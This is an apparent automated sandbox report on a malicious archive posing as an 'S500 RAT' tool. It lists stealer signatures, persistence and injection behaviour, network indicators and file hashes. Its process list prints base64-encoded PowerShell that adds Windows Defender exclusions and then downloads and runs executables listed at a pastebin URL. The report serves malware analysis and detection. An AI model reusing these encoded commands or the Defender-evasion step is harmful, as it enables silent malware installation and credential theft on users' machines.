Analysis Overview
SHA256
eb5e0956e26576d0c02cd7749476a564bd8671375ccca863efaa7347235fdb7d
Threat Level: Known bad
The file S500 RAT (2).zip was found to be: Known bad.
Malicious Activity Summary
Detect rhadamanthys stealer shellcode
Rhadamanthys
Drops file in Drivers directory
Blocklisted process makes network request
Executes dropped EXE
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-15 17:44
Signatures
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 18:15
Platform
win7-20240221-en
Max time kernel
1563s
Max time network
1574s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 18:15
Platform
win10-20240221-en
Max time kernel
315s
Max time network
1596s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 213.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.179.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-15 17:44
Reported
2024-03-15 17:50
Platform
win10v2004-20240226-en
Max time kernel
283s
Max time network
292s
Command Line
Signatures
Detect rhadamanthys stealer shellcode
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Rhadamanthys
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Windows\system32\relog.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\blackCC.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Windows\S500RAT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\S500RAT.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
| N/A | N/A | C:\Windows\system32\relog.exe | N/A |
| N/A | N/A | C:\Windows\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\blackCC.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ta9x4fa0 = "C:\\Users\\Admin\\AppData\\Local\\Systemservices\\winserv.exe" | C:\Users\Admin\w00ieq6n.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ta9x4fa0 | C:\Windows\system32\relog.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1256 set thread context of 3840 | N/A | C:\Users\Admin\w00ieq6n.exe | C:\Windows\system32\relog.exe |
| PID 3840 set thread context of 4088 | N/A | C:\Windows\system32\relog.exe | C:\Windows\system32\relog.exe |
| PID 3160 set thread context of 3168 | N/A | C:\Users\Admin\AppData\Local\Temp\Client.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\S500RAT.exe | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Client.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\w00ieq6n.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT (2).zip"
C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 3160 -ip 3160
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3160 -s 140
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.177.78.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | zbot.casperstealer.xyz | udp |
| US | 8.8.8.8:53 | zbot.casperstealer.xyz | udp |
| N/A | 127.0.0.1:59740 | tcp | |
| N/A | 127.0.0.1:59742 | tcp | |
| N/A | 127.0.0.1:59744 | tcp | |
| N/A | 127.0.0.1:59747 | tcp | |
| N/A | 127.0.0.1:59749 | tcp | |
| N/A | 127.0.0.1:59751 | tcp | |
| N/A | 127.0.0.1:59753 | tcp | |
| N/A | 127.0.0.1:59755 | tcp | |
| N/A | 127.0.0.1:59757 | tcp | |
| N/A | 127.0.0.1:59759 | tcp | |
| N/A | 127.0.0.1:59761 | tcp | |
| N/A | 127.0.0.1:59763 | tcp | |
| N/A | 127.0.0.1:59765 | tcp | |
| N/A | 127.0.0.1:59767 | tcp | |
| N/A | 127.0.0.1:59769 | tcp | |
| N/A | 127.0.0.1:59771 | tcp | |
| N/A | 127.0.0.1:59773 | tcp | |
| N/A | 127.0.0.1:59775 | tcp | |
| N/A | 127.0.0.1:59777 | tcp | |
| N/A | 127.0.0.1:59779 | tcp | |
| N/A | 127.0.0.1:59781 | tcp | |
| N/A | 127.0.0.1:59783 | tcp | |
| N/A | 127.0.0.1:59785 | tcp | |
| N/A | 127.0.0.1:59787 | tcp | |
| N/A | 127.0.0.1:59789 | tcp | |
| N/A | 127.0.0.1:59791 | tcp | |
| N/A | 127.0.0.1:59793 | tcp | |
| N/A | 127.0.0.1:59795 | tcp | |
| N/A | 127.0.0.1:59797 | tcp | |
| N/A | 127.0.0.1:59799 | tcp | |
| N/A | 127.0.0.1:59801 | tcp | |
| N/A | 127.0.0.1:59803 | tcp | |
| N/A | 127.0.0.1:59805 | tcp | |
| N/A | 127.0.0.1:59807 | tcp | |
| N/A | 127.0.0.1:59809 | tcp | |
| N/A | 127.0.0.1:59811 | tcp | |
| N/A | 127.0.0.1:59813 | tcp | |
| N/A | 127.0.0.1:59815 | tcp | |
| N/A | 127.0.0.1:59817 | tcp | |
| N/A | 127.0.0.1:59819 | tcp | |
| N/A | 127.0.0.1:59821 | tcp | |
| N/A | 127.0.0.1:59823 | tcp | |
| N/A | 127.0.0.1:59825 | tcp | |
| N/A | 127.0.0.1:59827 | tcp | |
| N/A | 127.0.0.1:59829 | tcp | |
| N/A | 127.0.0.1:59831 | tcp | |
| N/A | 127.0.0.1:59833 | tcp | |
| N/A | 127.0.0.1:59835 | tcp | |
| N/A | 127.0.0.1:59837 | tcp | |
| N/A | 127.0.0.1:59839 | tcp | |
| N/A | 127.0.0.1:59841 | tcp | |
| N/A | 127.0.0.1:59843 | tcp | |
| N/A | 127.0.0.1:59845 | tcp | |
| N/A | 127.0.0.1:59847 | tcp | |
| N/A | 127.0.0.1:59849 | tcp | |
| N/A | 127.0.0.1:59851 | tcp | |
| N/A | 127.0.0.1:59853 | tcp | |
| N/A | 127.0.0.1:59855 | tcp | |
| N/A | 127.0.0.1:59857 | tcp | |
| N/A | 127.0.0.1:59859 | tcp | |
| N/A | 127.0.0.1:59863 | tcp | |
| N/A | 127.0.0.1:59873 | tcp | |
| N/A | 127.0.0.1:59875 | tcp | |
| N/A | 127.0.0.1:59877 | tcp | |
| N/A | 127.0.0.1:59879 | tcp | |
| N/A | 127.0.0.1:59882 | tcp | |
| N/A | 127.0.0.1:59884 | tcp | |
| N/A | 127.0.0.1:59886 | tcp | |
| N/A | 127.0.0.1:59888 | tcp | |
| N/A | 127.0.0.1:59890 | tcp | |
| N/A | 127.0.0.1:59892 | tcp | |
| N/A | 127.0.0.1:59894 | tcp | |
| N/A | 127.0.0.1:59896 | tcp | |
| US | 8.8.8.8:53 | 91.16.208.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:59908 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
| MD5 | 9d934a508866d2b65b951b2324883bcb |
| SHA1 | be6d4e8dfd128bf5af66bc1a5a13cb055535d21f |
| SHA256 | 6570421db6fb394262b8eba6532bd4b7deb1cecb02d0ba85bc5829e412de493e |
| SHA512 | 55eca2b048b1655d23392be57491711784a32e56885b1e2611be51c040e85523b6e9c21da7da23a65ecd66b8645d7fad9b0ada3a0ae8e5f94e4381d8f64d0e92 |
C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe
| MD5 | 7563692a3c64430d1a24cae8cbac0f9a |
| SHA1 | b53dc51fcb128678191254f1e6dfd3cda783bd09 |
| SHA256 | fd332a27e1a3a081a02901dc23c37140b9a6e93ef34a49495bc2803d104367bb |
| SHA512 | 3d4ac2905c0c86e2e123ac4b6c1d4f4ecf7d6746d824a9aa46eb7a40c7dcedfcb427b903bc7985c72db0f466d17eaac1848acf35bb689aa922aaa507481b5ea3 |
C:\Users\Admin\w00ieq6n.exe
| MD5 | 93eb0cf0043f1f507a1b94eea7b65fe4 |
| SHA1 | 148be925922c60190bde523cb60a50da9e544da1 |
| SHA256 | 6cbd8961b21b75bb176439538633191ed8364e755c8b2d049ca7281871430d30 |
| SHA512 | 94640f8dfd1ceeb8ec72be3bd40bbafb8b4b8dda584dffcd88c6c616cd65ffb9b0087ed093231db3940211a3b5c3fc8efed957c4e8a701b0a61dfe1c943ccf58 |
memory/1256-243-0x0000000140000000-0x0000000140174000-memory.dmp
memory/1256-241-0x0000000140000000-0x0000000140174000-memory.dmp
memory/1880-245-0x0000000004730000-0x0000000004766000-memory.dmp
memory/1880-246-0x00000000731F0000-0x00000000739A0000-memory.dmp
memory/1880-250-0x00000000023D0000-0x00000000023E0000-memory.dmp
memory/1880-251-0x00000000023D0000-0x00000000023E0000-memory.dmp
C:\Windows\S500RAT.exe
| MD5 | f6034f0ecc5b0c9215fa297f0a6d8086 |
| SHA1 | cb441b8d0a2b4c4552059d5cf54a88fd6385f0c3 |
| SHA256 | f52de95c3d07431531c85a3bff804dbbcd27e66b8518a6772418da8de83b3cc0 |
| SHA512 | 8d0058ec65ef63bc7e79de61cf67e9d997d08df90ce045c35c7373ced3ac43d444d7b84e212fa6aebdc48a7cd6b72f6e670542a6fcc1c7f0402601b10edad5bc |
memory/1880-257-0x0000000004DA0000-0x00000000053C8000-memory.dmp
C:\Windows\S500RAT.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\S500RAT.exe
| MD5 | 1a748d332b043dcdfc01ef5a33814f9e |
| SHA1 | 1cc45394f502bcfbb08e8954f74da65bebd7d795 |
| SHA256 | 7258fa5dd4508257975ea74d00597d9ea40e6116a6d6ae4d6d3b45575f2ba6b5 |
| SHA512 | 7f7bd025c1317cc8dbf6543ad9b12d24555c2785a579364405e980468baa94ac6d67bd697b3aba93cd428c2c260f60dd70d0a361d9e5fd70d2fb7e64fc845d72 |
memory/1880-262-0x0000000005420000-0x0000000005442000-memory.dmp
memory/1880-263-0x00000000055C0000-0x0000000005626000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pqvl02qy.p11.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1880-264-0x0000000005630000-0x0000000005696000-memory.dmp
memory/1880-274-0x00000000057F0000-0x0000000005B44000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | 7c655abff6a2cb60d63842e05a51d6b2 |
| SHA1 | d70e03f8f670863b5c1434bbb3863ed32b9a6e2c |
| SHA256 | 617ecffcf86b6515feb92c6a52148f6639e1ccbc1451ed70ac686b06da6944f7 |
| SHA512 | 64da15689720ef98f46575c95b0ce771c1f8a65d1ced6a38d1e57e555226a4b7c502ac4d8b0765127c0d505e35826df842cb6e52e84012b094c1f4cacaafa9e0 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | cfaed64341dadf8e868d447328c4bb6b |
| SHA1 | 915dc18ec60326d08810b314ec90b73fc1286ef5 |
| SHA256 | 7edeb06238d3ee9f9e1bace3798a354ef171c7f70b506209e9c2f686b4a595c3 |
| SHA512 | 0f45676599fcefa604175e92947227d1500f76d37d0513d3afe7d7c3c8fc292071d160b1f64a2494f8d309dbddb7dd2f6c543c78f8b0abd2ea7cdede887c95b4 |
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
| MD5 | e8c69baf6333db176565c35b24bf907e |
| SHA1 | 3a6c6f3920007edbacdce4d65fc7b66e51152fa5 |
| SHA256 | f3a50f78359ea85a9b25926c59ece4cd96d0c1c9f9f2c3d1683b72fe651f0302 |
| SHA512 | ca984e8f3e7757fc476488acc353cf17a1964e00cd86a2a238f5e53867865802d0f11881db44e5954d8d3c891da1858f4ae235951ccc134d2115ea9687b3842f |
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | dbf35eac1c87ed287c8f7cba33d133b5 |
| SHA1 | d1dbfba561f8112e5099507a18cd9465b4fcb577 |
| SHA256 | 16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd |
| SHA512 | c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532 |
memory/1880-291-0x0000000005D30000-0x0000000005D4E000-memory.dmp
memory/1880-293-0x0000000005D80000-0x0000000005DCC000-memory.dmp
memory/368-294-0x0000000000400000-0x00000000016FC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Client.exe
| MD5 | 32a797a0ffe1c38536a192bfd5f2f97c |
| SHA1 | dd47a267aa0bfbe9a99064c62bed66b0fa8b2eb2 |
| SHA256 | 762c683be61f3e2704159d1248a0b1f66442211e00b862c437aaf02d58ada6cd |
| SHA512 | 49890d10eb60ca0391945ac647214521071cb112758fb0594dd96dca25f18080e42f51e048b90bb317b4187feccafef93b811b31070b5cc208c185e40e694b02 |
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
| MD5 | 462b459a2560b65a657cfecce53d682a |
| SHA1 | f0ce24faf42d2d1453c4f18fda0223b83486e5ae |
| SHA256 | 00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db |
| SHA512 | 5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b |
memory/3224-307-0x0000000000400000-0x00000000015D4000-memory.dmp
memory/3840-318-0x0000000140000000-0x0000000140174000-memory.dmp
memory/1932-319-0x00000000731F0000-0x00000000739A0000-memory.dmp
memory/1932-321-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/1932-320-0x0000000004DB0000-0x0000000004DC0000-memory.dmp
memory/3168-322-0x0000000000400000-0x0000000000473000-memory.dmp
memory/3168-324-0x0000000000400000-0x0000000000473000-memory.dmp
